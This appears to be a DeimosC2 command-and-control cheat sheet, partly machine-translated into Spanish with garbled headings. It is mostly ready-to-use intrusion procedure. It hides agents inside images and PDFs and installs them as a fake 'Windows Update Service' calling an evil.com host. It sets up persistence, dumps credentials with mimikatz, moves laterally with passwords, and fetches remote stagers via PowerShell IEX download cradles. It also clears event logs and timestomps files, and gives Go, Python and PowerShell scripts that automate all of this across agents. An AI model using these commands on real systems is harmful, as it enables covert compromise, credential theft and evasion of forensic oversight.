DeimosC2 Marco Cheat Sheet
"Clase de la hoja" idbutton id="deimosc2-copy-btn" class="copy-btn" onclick="copyAllCommands()" Copiar todos los comandos id="deimosc2-pdf-btn" class="pdf-btn" onclick="generatePDF()" Generar PDF seleccionado/button ■/div titulada
Sinopsis
DeimosC2 es un marco de mando y control post-explotación basado en Golang diseñado para operaciones de equipo rojo y pruebas de penetración. Construido con principios de arquitectura modernos, DeimosC2 se centra en la compatibilidad entre plataformas, comunicaciones seguras y capacidades completas después de la explotación, manteniendo al mismo tiempo una huella ligera y técnicas avanzadas de evasión.
NOVEDAD Advertencia: Esta herramienta está destinada a pruebas de penetración autorizadas y ejercicios de equipo rojo solamente. Asegúrese de tener la autorización adecuada antes de usar contra cualquier objetivo.
Instalación
Prerrequisitos
# Install Go 1.18+ and Git
sudo apt update
sudo apt install -y golang-go git build-essential
# Verify Go installation
go version
# Set Go environment variables
export GOPATH=$HOME/go
export PATH=$PATH:$GOPATH/bin
echo 'export GOPATH=$HOME/go' >> ~/.bashrc
echo 'export PATH=$PATH:$GOPATH/bin' >> ~/.bashrc
Instalación desde GitHub
# Clone DeimosC2 repository
git clone https://github.com/DeimosC2/DeimosC2.git
cd DeimosC2
# Build the server
go mod tidy
go build -o deimosc2-server ./cmd/server
# Build the agent
go build -o deimosc2-agent ./cmd/agent
# Make executables
chmod +x deimosc2-server deimosc2-agent
Docker Instalación
# Clone repository
git clone https://github.com/DeimosC2/DeimosC2.git
cd DeimosC2
# Build Docker image
docker build -t deimosc2 .
# Run DeimosC2 container
docker run -it --rm -p 8080:8080 -p 443:443 deimosc2
# Run with persistent data
docker run -it --rm -p 8080:8080 -p 443:443 -v $(pwd)/data:/app/data deimosc2
Compilation Cross-Platform
# Build for Windows (x64)
GOOS=windows GOARCH=amd64 go build -o deimosc2-agent.exe ./cmd/agent
# Build for Windows (x86)
GOOS=windows GOARCH=386 go build -o deimosc2-agent-x86.exe ./cmd/agent
# Build for Linux (x64)
GOOS=linux GOARCH=amd64 go build -o deimosc2-agent-linux ./cmd/agent
# Build for macOS (x64)
GOOS=darwin GOARCH=amd64 go build -o deimosc2-agent-macos ./cmd/agent
# Build for ARM64
GOOS=linux GOARCH=arm64 go build -o deimosc2-agent-arm64 ./cmd/agent
Uso básico
Iniciar el Servidor
# Start DeimosC2 server with default settings
./deimosc2-server
# Start with custom configuration
./deimosc2-server -config config.json
# Start with specific interface and port
./deimosc2-server -host 0.0.0.0 -port 8080
# Start with HTTPS
./deimosc2-server -tls -cert server.crt -key server.key
# Start in debug mode
./deimosc2-server -debug
Archivo de configuración
\\\\{
"server": \\\\{
"host": "0.0.0.0",
"port": 8080,
"tls": \\\\{
"enabled": true,
"cert_file": "server.crt",
"key_file": "server.key"
\\\\},
"auth": \\\\{
"username": "admin",
"password": "SecurePassword123!"
\\\\}
\\\\},
"database": \\\\{
"type": "sqlite",
"connection": "deimos.db"
\\\\},
"logging": \\\\{
"level": "info",
"file": "deimos.log"
\\\\},
"agents": \\\\{
"check_in_interval": 30,
"jitter": 10,
"max_retries": 5
\\\\}
\\\\}
Acceso a la interfaz web
# Access DeimosC2 web interface
http://localhost:8080
# HTTPS access
https://your-domain.com:443
# Default credentials (configurable)
Username: admin
Password: SecurePassword123!
Agente Despliegue
Agente básico Ejecución
# Windows agent
deimosc2-agent.exe -server http://192.168.1.100:8080
# Linux agent
./deimosc2-agent-linux -server http://192.168.1.100:8080
# macOS agent
./deimosc2-agent-macos -server http://192.168.1.100:8080
# Agent with custom parameters
./deimosc2-agent -server https://c2.example.com:443 -interval 60 -jitter 20
Opciones de configuración del agente
# Command line options
./deimosc2-agent -h
Options:
-server string C2 server URL (required)
-interval int Check-in interval in seconds (default: 30)
-jitter int Jitter percentage (default: 10)
-user-agent string Custom User-Agent string
-proxy string Proxy URL (http://proxy:port)
-cert string Custom CA certificate file
-insecure Skip TLS certificate verification
-debug Enable debug logging
Despliegue esteganográfico
# Embed agent in image
cat image.jpg deimosc2-agent.exe > hidden.jpg
# Extract and execute
tail -c +[image_size] hidden.jpg > agent.exe
./agent.exe -server http://192.168.1.100:8080
# Embed in PDF
cat document.pdf deimosc2-agent.exe > hidden.pdf
Instalación de servicio (Windows)
# Install as Windows service
sc create "DeimosAgent" binPath= "C:\Windows\Temp\deimosc2-agent.exe -server http://192.168.1.100:8080" start= auto
sc start "DeimosAgent"
# Install with custom service name
sc create "WindowsUpdateService" binPath= "C:\Windows\System32\deimosc2-agent.exe -server https://update.microsoft.com.evil.com:443" start= auto DisplayName= "Windows Update Service"
Mando y control
Agent Management
# List active agents
agents list
# Get agent information
agents info [agent_id]
# Execute command on agent
agents exec [agent_id] "whoami"
# Execute PowerShell on Windows agent
agents exec [agent_id] "powershell Get-Process"
# Kill agent
agents kill [agent_id]
# Rename agent
agents rename [agent_id] [new_name]
Operaciones de archivo
# Download file from agent
download [agent_id] C:\Users\Administrator\Documents\sensitive.docx
# Upload file to agent
upload [agent_id] payload.exe C:\Windows\Temp\update.exe
# List directory contents
ls [agent_id] C:\Users\Administrator\Documents
# Change directory
cd [agent_id] C:\Windows\System32
# Create directory
mkdir [agent_id] C:\Windows\Temp\data
# Remove file
rm [agent_id] C:\Windows\Temp\payload.exe
Gestión de procesos
# List processes
ps [agent_id]
# Kill process
kill [agent_id] [pid]
# Start process
start [agent_id] notepad.exe
# Process injection
inject [agent_id] [pid] [shellcode_file]
# Memory dump
memdump [agent_id] [pid] output.dmp
Operaciones de red
# Network discovery
discover [agent_id] 192.168.1.0/24
# Port scan
portscan [agent_id] 192.168.1.100 80,443,22,3389
# ARP scan
arpscan [agent_id] 192.168.1.0/24
# Network interfaces
ifconfig [agent_id]
# Routing table
route [agent_id]
# Network connections
netstat [agent_id]
Características avanzadas
Persistence Mechanisms
# Registry persistence (Windows)
persist registry [agent_id] HKCU "Software\Microsoft\Windows\CurrentVersion\Run" "WindowsUpdate" "C:\Windows\Temp\agent.exe"
# Scheduled task persistence (Windows)
persist schtask [agent_id] "SystemUpdate" "C:\Windows\Temp\agent.exe" "ONLOGON"
# Service persistence (Windows)
persist service [agent_id] "WindowsUpdateService" "C:\Windows\Temp\agent.exe"
# Cron persistence (Linux)
persist cron [agent_id] "*/5 * * * * /tmp/agent"
# Autostart persistence (Linux)
persist autostart [agent_id] "/tmp/agent"
# LaunchAgent persistence (macOS)
persist launchagent [agent_id] "com.apple.update" "/tmp/agent"
Escalada de Privilege
# UAC bypass (Windows)
elevate uac [agent_id] [payload_path]
# Token manipulation (Windows)
elevate token [agent_id] [target_pid]
# Sudo exploitation (Linux)
elevate sudo [agent_id] [command]
# SUID exploitation (Linux)
elevate suid [agent_id]
# Kernel exploits
elevate kernel [agent_id] [exploit_name]
Movimiento Lateral
# WMI execution (Windows)
lateral wmi [agent_id] 192.168.1.100 administrator password123 "whoami"
# PSExec execution (Windows)
lateral psexec [agent_id] 192.168.1.100 admin pass123 "systeminfo"
# PowerShell remoting (Windows)
lateral winrm [agent_id] 192.168.1.100 administrator password123 "Get-Process"
# SSH execution (Linux/macOS)
lateral ssh [agent_id] 192.168.1.50 root password123 "uname -a"
# SMB execution
lateral smb [agent_id] 192.168.1.100 admin pass123 "dir C:\"
Operaciones provisionales
# Dump credentials (Windows)
creds dump [agent_id]
# Mimikatz execution (Windows)
creds mimikatz [agent_id] "sekurlsa::logonpasswords"
# SAM dump (Windows)
creds sam [agent_id]
# LSA secrets (Windows)
creds lsa [agent_id]
# Browser credentials
creds browser [agent_id]
# SSH keys (Linux/macOS)
creds ssh [agent_id]
# Keychain dump (macOS)
creds keychain [agent_id]
Pivoting and Tunneling
# SOCKS proxy
pivot socks [agent_id] 1080
# Port forwarding
pivot portfwd [agent_id] 8080 192.168.1.100 80
# Reverse port forwarding
pivot rportfwd [agent_id] 3389 127.0.0.1 3389
# HTTP tunnel
pivot http [agent_id] 8080
# DNS tunnel
pivot dns [agent_id] tunnel.example.com
Data Collection
# Screenshot
screenshot [agent_id]
# Keylogger
keylog start [agent_id]
keylog stop [agent_id]
keylog dump [agent_id]
# Webcam capture
webcam [agent_id]
# Microphone recording
microphone [agent_id] 60
# Clipboard monitoring
clipboard [agent_id]
# File search
search [agent_id] C:\Users *.docx
# Registry search
regsearch [agent_id] HKLM password
Automatización y scripting
Go Automation Script
package main
import (
"bytes"
"encoding/json"
"fmt"
"io/ioutil"
"net/http"
"time"
)
type DeimosClient struct \\\\{
BaseURL string
Username string
Password string
HTTPClient *http.Client
Token string
\\\\}
type Agent struct \\\\{
ID string `json:"id"`
Hostname string `json:"hostname"`
Username string `json:"username"`
OS string `json:"os"`
IP string `json:"ip"`
Status string `json:"status"`
\\\\}
type Command struct \\\\{
AgentID string `json:"agent_id"`
Command string `json:"command"`
Args string `json:"args"`
\\\\}
func NewDeimosClient(baseURL, username, password string) *DeimosClient \\\\{
return &DeimosClient\\\\{
BaseURL: baseURL,
Username: username,
Password: password,
HTTPClient: &http.Client\\\\{Timeout: 30 * time.Second\\\\},
\\\\}
\\\\}
func (c *DeimosClient) Authenticate() error \\\\{
authData := map[string]string\\\\{
"username": c.Username,
"password": c.Password,
\\\\}
jsonData, _ := json.Marshal(authData)
resp, err := c.HTTPClient.Post(c.BaseURL+"/api/auth", "application/json", bytes.NewBuffer(jsonData))
if err != nil \\\\{
return err
\\\\}
defer resp.Body.Close()
if resp.StatusCode == 200 \\\\{
var result map[string]string
json.NewDecoder(resp.Body).Decode(&result)
c.Token = result["token"]
return nil
\\\\}
return fmt.Errorf("authentication failed")
\\\\}
func (c *DeimosClient) GetAgents() ([]Agent, error) \\\\{
req, _ := http.NewRequest("GET", c.BaseURL+"/api/agents", nil)
req.Header.Set("Authorization", "Bearer "+c.Token)
resp, err := c.HTTPClient.Do(req)
if err != nil \\\\{
return nil, err
\\\\}
defer resp.Body.Close()
var agents []Agent
json.NewDecoder(resp.Body).Decode(&agents)
return agents, nil
\\\\}
func (c *DeimosClient) ExecuteCommand(agentID, command string) error \\\\{
cmdData := Command\\\\{
AgentID: agentID,
Command: command,
\\\\}
jsonData, _ := json.Marshal(cmdData)
req, _ := http.NewRequest("POST", c.BaseURL+"/api/execute", bytes.NewBuffer(jsonData))
req.Header.Set("Authorization", "Bearer "+c.Token)
req.Header.Set("Content-Type", "application/json")
resp, err := c.HTTPClient.Do(req)
if err != nil \\\\{
return err
\\\\}
defer resp.Body.Close()
return nil
\\\\}
func (c *DeimosClient) AutomatedRecon(agentID string) \\\\{
commands := []string\\\\{
"whoami",
"hostname",
"pwd",
"ps",
"ifconfig",
"netstat -an",
"uname -a",
\\\\}
for _, cmd := range commands \\\\{
fmt.Printf("[+] Executing: %s\n", cmd)
c.ExecuteCommand(agentID, cmd)
time.Sleep(2 * time.Second)
\\\\}
\\\\}
func (c *DeimosClient) EstablishPersistence(agentID string) \\\\{
persistenceCommands := []string\\\\{
"persist registry HKCU \"Software\\Microsoft\\Windows\\CurrentVersion\\Run\" \"WindowsUpdate\" \"C:\\Windows\\Temp\\agent.exe\"",
"persist schtask \"SystemUpdate\" \"C:\\Windows\\Temp\\agent.exe\" \"ONLOGON\"",
"persist service \"WindowsUpdateService\" \"C:\\Windows\\Temp\\agent.exe\"",
\\\\}
for _, cmd := range persistenceCommands \\\\{
fmt.Printf("[+] Establishing persistence: %s\n", cmd)
c.ExecuteCommand(agentID, cmd)
time.Sleep(3 * time.Second)
\\\\}
\\\\}
func main() \\\\{
client := NewDeimosClient("http://192.168.1.100:8080", "admin", "SecurePassword123!")
// Authenticate
if err := client.Authenticate(); err != nil \\\\{
fmt.Printf("Authentication failed: %v\n", err)
return
\\\\}
// Get active agents
agents, err := client.GetAgents()
if err != nil \\\\{
fmt.Printf("Failed to get agents: %v\n", err)
return
\\\\}
fmt.Printf("[+] Found %d active agents\n", len(agents))
// Process each agent
for _, agent := range agents \\\\{
fmt.Printf("[+] Processing agent: %s (%s)\n", agent.ID, agent.Hostname)
// Perform reconnaissance
client.AutomatedRecon(agent.ID)
// Establish persistence
client.EstablishPersistence(agent.ID)
// Wait before processing next agent
time.Sleep(10 * time.Second)
\\\\}
\\\\}
Python Automation Script
#!/usr/bin/env python3
# DeimosC2 Python automation script
import requests
import json
import time
from urllib3.exceptions import InsecureRequestWarning
# Disable SSL warnings
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
class DeimosClient:
def __init__(self, base_url, username, password):
self.base_url = base_url.rstrip('/')
self.username = username
self.password = password
self.session = requests.Session()
self.session.verify = False
self.token = None
def authenticate(self):
"""Authenticate with DeimosC2 server"""
auth_data = \\\\{
'username': self.username,
'password': self.password
\\\\}
response = self.session.post(f"\\\\{self.base_url\\\\}/api/auth", json=auth_data)
if response.status_code == 200:
self.token = response.json().get('token')
self.session.headers.update(\\\\{'Authorization': f'Bearer \\\\{self.token\\\\}'\\\\})
print("[+] Authentication successful")
return True
else:
print("[-] Authentication failed")
return False
def get_agents(self):
"""Get list of active agents"""
response = self.session.get(f"\\\\{self.base_url\\\\}/api/agents")
if response.status_code == 200:
return response.json()
return []
def execute_command(self, agent_id, command):
"""Execute command on agent"""
cmd_data = \\\\{
'agent_id': agent_id,
'command': command
\\\\}
response = self.session.post(f"\\\\{self.base_url\\\\}/api/execute", json=cmd_data)
return response.status_code == 200
def download_file(self, agent_id, remote_path, local_path):
"""Download file from agent"""
download_data = \\\\{
'agent_id': agent_id,
'remote_path': remote_path
\\\\}
response = self.session.post(f"\\\\{self.base_url\\\\}/api/download", json=download_data)
if response.status_code == 200:
with open(local_path, 'wb') as f:
f.write(response.content)
return True
return False
def upload_file(self, agent_id, local_path, remote_path):
"""Upload file to agent"""
with open(local_path, 'rb') as f:
files = \\\\{'file': f\\\\}
data = \\\\{
'agent_id': agent_id,
'remote_path': remote_path
\\\\}
response = self.session.post(f"\\\\{self.base_url\\\\}/api/upload", files=files, data=data)
return response.status_code == 200
def automated_recon(self, agent_id):
"""Perform automated reconnaissance"""
commands = [
"whoami",
"hostname",
"pwd",
"ps",
"ifconfig",
"netstat -an",
"uname -a"
]
for cmd in commands:
print(f"[+] Executing: \\\\{cmd\\\\}")
self.execute_command(agent_id, cmd)
time.sleep(2)
def credential_harvesting(self, agent_id):
"""Harvest credentials from agent"""
commands = [
"creds dump",
"creds mimikatz \"sekurlsa::logonpasswords\"",
"creds sam",
"creds browser"
]
for cmd in commands:
print(f"[+] Harvesting credentials: \\\\{cmd\\\\}")
self.execute_command(agent_id, cmd)
time.sleep(5)
def establish_persistence(self, agent_id):
"""Establish persistence on agent"""
persistence_commands = [
'persist registry HKCU "Software\\Microsoft\\Windows\\CurrentVersion\\Run" "WindowsUpdate" "C:\\Windows\\Temp\\agent.exe"',
'persist schtask "SystemUpdate" "C:\\Windows\\Temp\\agent.exe" "ONLOGON"',
'persist service "WindowsUpdateService" "C:\\Windows\\Temp\\agent.exe"'
]
for cmd in persistence_commands:
print(f"[+] Establishing persistence: \\\\{cmd\\\\}")
self.execute_command(agent_id, cmd)
time.sleep(3)
def lateral_movement(self, agent_id, targets):
"""Perform lateral movement"""
for target in targets:
commands = [
f'lateral wmi \\\\{target\\\\} administrator password123 "whoami"',
f'lateral psexec \\\\{target\\\\} admin pass123 "systeminfo"',
f'lateral ssh \\\\{target\\\\} root password123 "uname -a"'
]
for cmd in commands:
print(f"[+] Lateral movement: \\\\{cmd\\\\}")
self.execute_command(agent_id, cmd)
time.sleep(3)
def main():
client = DeimosClient("http://192.168.1.100:8080", "admin", "SecurePassword123!")
# Authenticate
if not client.authenticate():
return
# Get active agents
agents = client.get_agents()
print(f"[+] Found \\\\{len(agents)\\\\} active agents")
# Process each agent
for agent in agents:
agent_id = agent['id']
hostname = agent.get('hostname', 'unknown')
print(f"[+] Processing agent: \\\\{agent_id\\\\} (\\\\{hostname\\\\})")
# Perform reconnaissance
client.automated_recon(agent_id)
# Harvest credentials
client.credential_harvesting(agent_id)
# Establish persistence
client.establish_persistence(agent_id)
# Lateral movement
targets = ["192.168.1.101", "192.168.1.102"]
client.lateral_movement(agent_id, targets)
# Wait before processing next agent
time.sleep(10)
if __name__ == "__main__":
main()
Automatización PowerShell
# DeimosC2 PowerShell automation script
function Invoke-DeimosAutomation \\\\{
param(
[string]$ServerURL = "http://192.168.1.100:8080",
[string]$Username = "admin",
[string]$Password = "SecurePassword123!"
)
# Create web session
$session = New-Object Microsoft.PowerShell.Commands.WebRequestSession
# Authenticate
$authData = @\\\\{
username = $Username
password = $Password
\\\\}|ConvertTo-Json
try \\\\{
$authResponse = Invoke-WebRequest -Uri "$ServerURL/api/auth" -Method POST -Body $authData -ContentType "application/json" -WebSession $session
$token = ($authResponse.Content|ConvertFrom-Json).token
$session.Headers.Add("Authorization", "Bearer $token")
Write-Host "[+] Authentication successful"
\\\\}
catch \\\\{
Write-Error "Authentication failed: $_"
return
\\\\}
# Get active agents
try \\\\{
$agentsResponse = Invoke-WebRequest -Uri "$ServerURL/api/agents" -WebSession $session
$agents = $agentsResponse.Content|ConvertFrom-Json
Write-Host "[+] Found $($agents.Count) active agents"
\\\\}
catch \\\\{
Write-Error "Failed to get agents: $_"
return
\\\\}
# Process each agent
foreach ($agent in $agents) \\\\{
$agentId = $agent.id
$hostname = $agent.hostname
Write-Host "[+] Processing agent: $agentId ($hostname)"
# Reconnaissance commands
$commands = @(
"whoami",
"hostname",
"systeminfo",
"tasklist",
"ipconfig /all",
"netstat -an"
)
foreach ($cmd in $commands) \\\\{
$cmdData = @\\\\{
agent_id = $agentId
command = $cmd
\\\\}|ConvertTo-Json
try \\\\{
Invoke-WebRequest -Uri "$ServerURL/api/execute" -Method POST -Body $cmdData -ContentType "application/json" -WebSession $session
Write-Host "[+] Executed: $cmd"
Start-Sleep -Seconds 2
\\\\}
catch \\\\{
Write-Warning "Failed to execute command '$cmd': $_"
\\\\}
\\\\}
# Establish persistence
$persistenceCommands = @(
'persist registry HKCU "Software\Microsoft\Windows\CurrentVersion\Run" "WindowsUpdate" "C:\Windows\Temp\agent.exe"',
'persist schtask "SystemUpdate" "C:\Windows\Temp\agent.exe" "ONLOGON"'
)
foreach ($cmd in $persistenceCommands) \\\\{
$cmdData = @\\\\{
agent_id = $agentId
command = $cmd
\\\\}|ConvertTo-Json
try \\\\{
Invoke-WebRequest -Uri "$ServerURL/api/execute" -Method POST -Body $cmdData -ContentType "application/json" -WebSession $session
Write-Host "[+] Persistence established: $cmd"
Start-Sleep -Seconds 3
\\\\}
catch \\\\{
Write-Warning "Failed to establish persistence: $_"
\\\\}
\\\\}
# Wait before processing next agent
Start-Sleep -Seconds 10
\\\\}
\\\\}
# Execute automation
Invoke-DeimosAutomation
Integración con otras herramientas
Integración Metasploit
# Use DeimosC2 for initial access, pivot to Metasploit
# Generate Metasploit payload
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.1.100 LPORT=8443 -f exe -o meterpreter.exe
# Upload via DeimosC2 agent
upload [agent_id] meterpreter.exe C:\Windows\Temp\update.exe
# Execute Metasploit payload
agents exec [agent_id] "C:\Windows\Temp\update.exe"
# Handle in Metasploit
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_https
set LHOST 192.168.1.100
set LPORT 8443
run
Empire Integration
# Generate Empire stager
# Use DeimosC2 for initial access, pivot to Empire
# From DeimosC2 agent
agents exec [agent_id] "powershell IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.100/empire_stager.ps1')"
# Handle in Empire
./empire
listeners
uselistener http
set Host 192.168.1.100
set Port 8080
execute
Cobalt Strike Integration
# Beacon integration
# Generate Cobalt Strike beacon
# Use DeimosC2 for initial access, pivot to Beacon
# From DeimosC2 agent
agents exec [agent_id] "powershell IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.100/beacon.ps1')"
# Handle in Cobalt Strike team server
Seguridad operacional
Seguridad de la comunicación
# Use HTTPS with valid certificates
# Configure domain fronting
# Implement certificate pinning
# Use legitimate user agents
# Generate SSL certificates
openssl req -new -x509 -keyout server.key -out server.crt -days 365 -nodes
# Start DeimosC2 with SSL
./deimosc2-server -tls -cert server.crt -key server.key
Obfuscación de tráfico
# Use custom user agents
# Implement jitter and delays
# Mimic legitimate traffic patterns
# Use common ports and protocols
# Example obfuscated agent execution
./deimosc2-agent -server https://cdn.example.com:443 -user-agent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" -jitter 30
Anti-Forenseics
# Clear event logs
agents exec [agent_id] "wevtutil cl System"
agents exec [agent_id] "wevtutil cl Security"
agents exec [agent_id] "wevtutil cl Application"
# Clear PowerShell history
agents exec [agent_id] "powershell Remove-Item (Get-PSReadlineOption).HistorySavePath -Force"
# Timestomping
agents exec [agent_id] "powershell $(Get-Item file.exe).LastWriteTime = '01/01/2020 12:00:00'"
Solución de problemas
Cuestiones comunes
# Agent not connecting
1. Check firewall rules
2. Verify server configuration
3. Test network connectivity
4. Check certificate issues
# Go build issues
go mod tidy
go clean -cache
# SSL certificate issues
openssl req -new -x509 -keyout server.key -out server.crt -days 365 -nodes
Modo de depuración
# Enable debug logging
./deimosc2-server -debug
# Agent debug mode
./deimosc2-agent -debug -server http://192.168.1.100:8080
# Check network connectivity
telnet 192.168.1.100 8080
Buenas prácticas
Planificación operacional
- ** Configuración previa a la instalación**: Configurar el servidor y compilar agentes antes del compromiso
- ** Gestión de la asistencia**: Use nombres de agente descriptivos y organice por red
- Protolos de comunicación: Establecer canales de comunicación C2 seguros
- Manejo de datos: Implementar la recopilación y el almacenamiento seguros de datos
- ** Procedimientos de cierre**: Plan de eliminación de artefactos y limpieza de agentes
Consideraciones de seguridad
# Secure deployment
# Use strong authentication
# Enable HTTPS with valid certificates
# Implement network segmentation
# Regular security updates
# Agent management
# Use unique agent identifiers
# Implement agent timeouts
# Regular agent rotation
# Secure communication channels
Documentación y presentación de informes
# Operation documentation
# Maintain agent logs
# Document all activities
# Track compromised systems
# Generate executive reports
# Artifact tracking
# Monitor IOCs
# Document forensic artifacts
# Implement attribution prevention
Recursos
- DeimosC2 GitHub Repository
- DeimosC2 Documentation
- Go Programming Language
- MITRE ATT limitadaCK Framework
- SANS Red Team Operations
-...
*Esta hoja de trampa proporciona una referencia completa para usar el marco DeimosC2. Siempre asegúrese de tener una autorización adecuada antes de realizar operaciones de equipo rojo o pruebas de penetración. *